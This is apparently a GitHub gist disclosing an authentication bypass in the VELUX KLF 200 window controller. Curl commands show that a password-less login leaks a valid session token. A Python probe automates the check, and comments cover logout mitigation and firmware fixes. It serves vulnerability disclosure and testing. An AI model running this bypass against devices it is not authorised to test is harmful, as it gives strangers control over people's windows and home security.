@Julius2342
Last active August 6, 2021 15:44

Security Flaw within VELUX KLF 200

Another episode of the Internet of Things done wrong. This exploit is so trivial that I would hesitate to even call it an exploit.

Introduction

VELUX[0] is the leading manufacturer of roof windows (they are really great!). The VELUX KLF 200 is a device for controlling VELUX windows over Ethernet/the internet[1]. The KLF 200 has an undocumented HTTP API for executing scenes, in other words for opening and closing VELUX windows.

Description of security flaw

Expected behaviour with the correct password (the `)]}',` line at the top of every reply is emitted by the device in front of the JSON body):

julius@macbook ~:$ curl 'http://192.168.2.127/api/v1/auth' -X POST -d '{"action":"login","params":{"password":"velux123"}}'
)]}',
{"token":"6XmONGhWRF5Wcu4XrTHZLA==","result":true,"deviceStatus":"IDLE","data":{},"errors":[]}

Expected behaviour with a wrong password:

julius@macbook ~:$ curl 'http://192.168.2.127/api/v1/auth' -X POST -d '{"action":"login","params":{"password":"fnord"}}'
)]}',
{"result":false,"deviceStatus":"IDLE","data":{},"errors":[401]}

Login without any password (no "params" object in the request at all):

julius@macbook ~:$ curl 'http://192.168.2.127/api/v1/auth' -X POST -d '{"action":"login"}'
)]}',
{"token":"6XmONGhWRF5Wcu4XrTHZLA==","result":false,"deviceStatus":"IDLE","data":{},"errors":[999]}

The login is reported as failed ("result":false, error 999), yet the reply still carries a token, and that token is accepted as a valid bearer token by the rest of the API:

julius@macbook ~:$ curl 'http://192.168.2.127/api/v1/products' -H 'Authorization: Bearer 6XmONGhWRF5Wcu4XrTHZLA==' -X POST -d '{"action":"get"}'
)]}',
{"token":"6XmONGhWRF5Wcu4XrTHZLA==","result":true,"deviceStatus":"IDLE","data":[...],"errors":[]}

I assume this is not expected behaviour: a client that knows no password ends up with a session token the API accepts.
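As an added worked example (not code from the gist, and not VELUX's own code), the following Python probe reproduces the check above end to end. It strips the `)]}',` prefix the device puts in front of every JSON reply, classifies the login reply, and, when a token is leaked, confirms that the token is accepted by /api/v1/products before invalidating it with the logout call that mtdcr suggests further down in the thread. The urllib transport talks to a real device; the SimulatedKlf200 class is a constructed stand-in modelled on the replies shown on this page, and its behaviour when no session is active (error 999 without a token) is an assumption, since the gist shows no such reply.

```python
"""Check whether a KLF 200 (HTTP API v1) hands out a session token on a password-less login."""
import json
import sys
import urllib.request
from typing import Callable, Optional

# Every reply from the device starts with this anti-JSON-hijacking marker (see the
# curl output above); it must be stripped before the JSON body can be parsed.
XSSI_PREFIX = ")]}',"

# A transport sends one POST: (path, JSON payload, bearer token or None) -> raw body.
Transport = Callable[[str, dict, Optional[str]], str]


def parse_klf_reply(body: str) -> dict:
    """Strip the ")]}'," prefix and parse the JSON object that follows it."""
    text = body.lstrip()
    if text.startswith(XSSI_PREFIX):
        text = text[len(XSSI_PREFIX):]
    return json.loads(text)


def assess_login_reply(reply: dict) -> str:
    """Classify a /api/v1/auth login reply:
    'ok'         result true with a token        (correct password)
    'rejected'   result false, no token          (wrong password, errors [401])
    'token-leak' result false but a token anyway (the flaw described above)"""
    token = reply.get("token")
    if reply.get("result") is True and token:
        return "ok"
    return "token-leak" if token else "rejected"


def urllib_transport(base_url: str) -> Transport:
    """Real transport for a device at base_url, e.g. 'http://192.168.2.127'."""
    def send(path: str, payload: dict, token: Optional[str]) -> str:
        headers = {"Content-Type": "application/json"}
        if token:
            headers["Authorization"] = "Bearer " + token
        req = urllib.request.Request(base_url + path, data=json.dumps(payload).encode(),
                                     headers=headers, method="POST")
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.read().decode()
    return send


def check_klf200(send: Transport) -> dict:
    """Log in without a password. If a token comes back, prove it is usable against
    /api/v1/products, then invalidate it with a logout (the mitigation from the thread)."""
    login = parse_klf_reply(send("/api/v1/auth", {"action": "login"}, None))
    verdict = assess_login_reply(login)
    result = {"login": verdict, "token_accepted": False, "logged_out": False}
    if verdict != "token-leak":
        return result
    token = login["token"]
    products = parse_klf_reply(send("/api/v1/products", {"action": "get"}, token))
    result["token_accepted"] = products.get("result") is True
    logout = parse_klf_reply(send("/api/v1/auth", {"action": "logout", "params": {}}, token))
    result["logged_out"] = logout.get("result") is True
    return result


class SimulatedKlf200:
    """Constructed stand-in for a device on firmware 0.1.1.0.41.0, modelled on the replies
    shown on this page (not captured from hardware). It keeps one session token while
    someone is logged in, which is what the password-less login leaks."""
    def __init__(self, password: str, active_token: Optional[str]):
        self.password, self.token = password, active_token

    def _wrap(self, obj: dict) -> str:
        return XSSI_PREFIX + "\n" + json.dumps(obj)

    def send(self, path: str, payload: dict, bearer: Optional[str]) -> str:
        base = {"deviceStatus": "IDLE", "data": {}, "errors": []}
        if path == "/api/v1/auth" and payload.get("action") == "login":
            pw = payload.get("params", {}).get("password")
            if pw == self.password:
                self.token = self.token or "6XmONGhWRF5Wcu4XrTHZLA=="
                return self._wrap({**base, "token": self.token, "result": True})
            if pw is None:  # the flaw: missing params still returns the live session token
                # Assumption: with no active session the reply is error 999 without a token.
                leak = {"token": self.token} if self.token else {}
                return self._wrap({**base, **leak, "result": False, "errors": [999]})
            return self._wrap({**base, "result": False, "errors": [401]})
        if path == "/api/v1/auth" and payload.get("action") == "logout" and bearer and bearer == self.token:
            self.token = None
            return self._wrap({**base, "result": True})
        if path == "/api/v1/products" and bearer and bearer == self.token:
            return self._wrap({**base, "data": [], "token": self.token, "result": True})
        return self._wrap({**base, "result": False, "errors": [401]})


if __name__ == "__main__":
    # With a URL on the command line the real device is probed; otherwise the simulation.
    device = SimulatedKlf200("velux123", "6XmONGhWRF5Wcu4XrTHZLA==")
    send = urllib_transport(sys.argv[1]) if len(sys.argv) > 1 else device.send
    print(json.dumps(check_klf200(send)))
```

Run it as `python3 probe.py http://192.168.2.127` against a device on the affected firmware while a user is logged in; a result of `{"login": "token-leak", "token_accepted": true, ...}` means the bug is present, and the probe's final logout leaves no session behind for the next caller to pick up.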

Software version

Current version: 0.1.1.0.41.0

[0] http://www.velux.com/
[1] http://velcdn.azureedge.net/~/media/marketing/de/dokumente/pdf/produktanleitungen/produktdatenblatt/integra/velux-produktdatenblatt-integra-interface-klf200.pdf?la=de-de

@jkiddo

jkiddo commented Jul 14, 2017

nicely done

@PeteBear

Hi,

I also got my KLF200 just 3 hrs ago. I feel it is very frustrating, as I cannot get the programs to load. I am hoping to link it to Home Assistant, as there is a component available, but there is no data on how to run the programs etc.

Could you explain the above as though I was a 2-year-old, as I think I am getting confused with the tokens?

@mtdcr

mtdcr commented Aug 31, 2017

This issue is in effect only if there's an active session. To mitigate the impact, you can invalidate the session by using the logout button or by running this command:
curl 'http://192.168.2.127/api/v1/auth' -X POST -d '{"action":"logout","params":{}}' -H 'Authorization: Bearer 6XmONGhWRF5Wcu4XrTHZLA=='
(insert your authorization token)

@VELUX: Please provide a software update to your customers! It shouldn't be too hard, I guess.

@Julius2342 (author)

Velux say they have an updated version of the firmware which fixes this issue: https://updates2.velux.com/ I did not try it out yet.

@jkiddo

jkiddo commented May 14, 2018

It's pretty much an empty page :|

@SKelem

SKelem commented Jul 13, 2018

Still empty, 2 months later...

@Sven-H-x

Sven-H-x commented Aug 7, 2018

try: https://updates2.velux.com/download/3119c782-c708-456f-a75b-dee45f9402ec

It is version KLF200-v1.1.0.44.bin from about 3 April 2018.
My latest device (I got it today) already has 0.1.1.0.45.0.

@Arduous

Arduous commented Aug 13, 2018

Hello, beware: my German is not good, but I managed to understand that all the scenes are deleted during the upgrade process, and that rediscovering the shutters and getting them paired again was pretty hectic for the user reporting it.

@Sven-H-x how did you manage to get this link? Do you by any chance have release notes?

@tobiasweibel

Maybe somebody wants to continue hacking here: https://updates2.velux.com/download (self-documented API; I didn't test whether there is a security issue there as well).

@klf200developer

klf200developer commented Oct 3, 2018

Thanks for the input. This feature has been classified as a bug and is fixed in the latest firmware update, version 2.0.0.71.
Be aware that the KLF200 interface has been changed from HTTP to SLIP.
Here is a link to our official page with the changelog and API documentation:
https://www.velux.com/api/klf200
